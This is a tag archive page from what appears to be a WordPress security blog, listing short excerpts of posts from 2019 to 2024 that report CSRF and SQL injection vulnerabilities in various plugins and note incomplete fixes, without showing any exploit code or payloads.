Login

Tag Archives: Cross-Site Request Forgery (CSRF)/SQL Injection

16 Jan 2024

Cross-Site Request Forgery (CSRF)/SQL Injection Vulnerability in Pre* Party Resource Hints

Recently, Patchstack vaguely claimed there was an authenticated SQL injection vulnerability in the plugin Pre* Party Resource Hints. They were claiming it was only exploitable by users with the Administrator role, so that wouldn’t be a vulnerability, since they can already do the equivalent of that. In that situation, there might be a cross-site request forgery (CSRF)/SQL injection vulnerability if there is improperly secured code, though. While Patchstack provided no details, Anthony Thorne else pointed to code improperly secured against SQL injection. The developer has now made an improper attempt to fix that issue.

[Read more]

11 Jan 2024

Authenticated SQL Injection Vulnerability in PDF Invoices & Packing Slips for WooCommerce

One of the changelog entries for the latest version of the WordPress plugin PDF Invoices & Packing Slips for WooCommerce is “Fix: potential SQL injection bug in Number Tools”. In looking into that, we found that this wasn’t a potential issue, but a vulnerability. Specifically, it is an authenticated SQL injection vulnerability exploitable by users with the Shop Manager role. It is also a cross-site request forgery (CSRF)/SQL injection vulnerability that could be exploited against Shop Managers and Administrators. We also found it hadn’t been fully fixed.

Looking at the changes made in the new version, we saw that in the file /includes/tables/class-wcpdf-number-store-list-table.php changes were being made related to user input being passed in to a SQL statement. That code is accessed when accessing this admin page from the plugin: /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=debug&section=numbers . While the developer was already using a prepared SQL statement, they are, for some reason, passing user input directly in to it when they shouldn’t, which defeats the purpose of the protection offered by a prepared SQL statement. The new version still doesn’t resolve that, as that aspect of this wasn’t addressed. Instead, the developer passed the user input through sanitize_text_field(), which doesn’t stop SQL injection. That involves the variable $search: [Read more]

5 Apr 2023

Our Firewall Plugin Caught That SQL Injection Vulnerability Tenable Discovered Hasn’t Actually Been Fixed

Last month, security provider Tenable claimed that an authenticated SQL injection vulnerability had existed in the WordPress plugin ReviewX and was fixed in version 1.6.4. It turns out the vulnerability hasn’t been fixed.

The CVE system allowed Tenable to create a CVE ID for this, CVE-2023-26325, and didn’t check to make sure the claims were accurate [Read more]

11 Feb 2022

Our Plugin Security Checker Warned of Misuse of esc_sql() in WordPress Plugin That Leads to SQL Injection Vulnerability

One of the things we offer to help people keep their WordPress websites protected from vulnerabilities in WordPress plugins is our Plugin Security Checker, which flags the possibility of some instances of security issues in plugins.

To continue to improve the results being produced by that, we occasionally check issues being flagged by that when people run plugins from the WordPress plugin directory through that. Recently the plugin Code Manager was run through that. One of the issues identified was the possible misuse of the esc_sql() function: [Read more]

16 Jul 2021

Vulnerability Details: Cross-Site Request Forgery(CSRF)/SQL Injection in WP Simple Booking Calendar

Fixing a security vulnerability doesn’t do much good if those already using the software are not provided with the new version. That is area where our service can help, as can be seen with the plugin WP Simple Booking Calendar, which fixed a minor security vulnerability, but where the version number hasn’t been bumped.

[Read more]

24 May 2021

Vulnerability Details: CRSF/SQL Injection Vulnerability in Side Menu

The plugin Side Menu was closed on the WordPress Plugin Directory on Wednesday. On Friday a new version was submitted with the changelog entry “Fixed: Security parameters”. Running the previous version of the plugin through our Plugin Security Checker flagged several possible instances of SQL injection in the code, which we found could be exploited through cross-site request forgery (CSRF) and had been fixed in the new version. In looking into that, we found another vulnerability that still exists in the plugin.

[Read more]

28 Feb 2020

Recently Closed WordPress Plugin with 60,000+ Installs Contains Multiple Vulnerabilities

The plugin Contact Form Submissions was closed on the WordPress Plugin Directory yesterday. That is one of the 1,000 most popular plugins with 60,000+ installs, so we were alerted to its closure. While we were looking in to the plugin to see if there were any serious vulnerabilities we should be warning users of the plugin that also use our service, we found that it contains a CSV injection vulnerability and an authenticated SQL injection vulnerability, which can also exploited through cross-site request forgery (CSRF).

The CSV injection vulnerability involves a lack of escaping when using the plugin “Export to CSV” feature, as can be confirmed with the proof of concept below. [Read more]

30 Aug 2019

Vulnerability Details: Cross-Site Request Forgery (CSRF)/SQL Injection in WooCommerce Live Checkout Field Capture

One of the changelog entries for the latest version of the plugin WooCommerce Live Checkout Field Capture is “Improved database query security”.  Looking at the changes made we found that referred to a SQL injection vulnerability exploitable through cross-site request forgery (CSRF), where the SQL injection portion was fixed, but not the CSRF portion.

[Read more]